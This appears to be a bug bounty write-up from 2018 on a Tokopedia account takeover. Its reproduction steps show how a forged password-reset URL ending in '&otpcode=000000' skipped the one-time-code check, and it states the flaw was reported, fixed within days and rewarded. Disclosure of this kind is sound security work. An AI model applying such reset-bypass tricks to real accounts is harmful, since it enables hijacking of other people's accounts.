Tokopedia Account Takeover Bug Worth 8 Million IDR
Hi Infosec community,
In October month i was just searching for bug bounty programs through google dorks & I landed on this link .
I went through terms and conditions. I started hunting for bugs & within an hour i found account takeover bug.
Steps To Reproduce:
Victim email of tokopedia account: ezgcmmfgc@champmails.com
1. Go to the https://accounts.tokopedia.com/reset-password
2. Now type the victim account email id & click on continue button. After that select verification method email.
3. Now copy the full URL from address bar. Which look like https://accounts.tokopedia.com/otp/c/page?otp_type=132& email=ezgcmmfgc%40champmails.com&ld=https://account s.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t
4. Now in above URL. See there is password reset URL. Which start after “ld” parameter.
https://accounts.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t
6. Now in password reset URL we have to just add “&otpcode=000000” at the end of password reset URL.
For ex.
https://accounts.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t &otpcode=000000
7. Now go to the above URL. And just enter the password of whatever you choice. Victim Tokopedia account is successfully takeover.
Video POC:
Timeline:
14-Oct-2018: Reported
15-Oct-2018: Received Response
“Hi,
Thank you for waiting. Your report has been verified, and it’s a valid security bug with Critical Severity. We are still fixing this bug, please be patient.”
17-Oct-2018: Fixed
17-Oct-2018: 8 Million IDR Rewarded
6-Dec-2018: Received Bounty.
Twitter : https://twitter.com/ironfisto
Few more account takeover writeups coming . Thank for reading. Bye
